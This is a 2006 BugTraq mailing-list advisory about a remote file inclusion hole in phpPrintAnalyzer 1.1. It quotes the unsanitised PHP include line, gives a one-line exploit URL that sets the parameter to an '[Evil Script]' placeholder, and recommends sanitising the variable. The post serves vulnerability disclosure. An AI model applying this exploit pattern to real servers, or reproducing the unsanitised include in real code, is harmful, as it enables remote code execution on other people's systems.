BugTraq
phpPrintAnalyzer <= 1.1 (rep_par_rapport_racine) Remote File Inclusion Vulnerability Aug 07 2006 08:19PM
sh3ll sh3ll ir (1 replies)
------------------------------------------------------------------------
---------------

phpPrintAnalyzer 1.1 rep_par_rapport_racine Remote File Inclusion

------------------------------------------------------------------------
---------------

Author : Sh3ll

Date : 2006/04/27

Location : Iran - Tehran

HomePage : http://www.sh3ll.ir

Email : sh3ll[at]sh3ll[dot]ir

Critical Level : Dangerous

------------------------------------------------------------------------
---------------

Affected Software Description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : phpPrintAnalyzer

version : 1.1

URL : http://tpequet.free.fr/phpPrintAnalyzer

Description :

phpPrintAnalyzer is a Web Application for CUPS System to Analyze

the "page_log" Files and Get HTML Graphics (with JpGraph)

------------------------------------------------------------------------
---------------

Vulnerability:

~~~~~~~~~~~~~

in index.php We Found Vulnerability Script

----------------------------------------index.php-----------------------
---------------

....

<?php

include($rep_par_rapport_racine."inc/img.inc.php");

?>

...

------------------------------------------------------------------------
---------------

Exploit:

~~~~~~~

http://www.target.com/[phpPrintAnalyzer]/index.php?rep_par_rapport_racin
e=[Evil Script]

Solution:

~~~~~~~~

Sanitize Variabel $rep_par_rapport_racine in index.php

------------------------------------------------------------------------
----------------

Shoutz:

~~~~~~

~ Special Greetz to My Best Friends Atena & N4sh3n4s

~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams

[ reply ]
Re: phpPrintAnalyzer <= 1.1 (rep_par_rapport_racine) Remote File Inclusion Vulnerability Aug 14 2006 07:26PM
Carsten Eilers (ceilers-lists gmx de)


 

Privacy Statement
Copyright 2010, SecurityFocus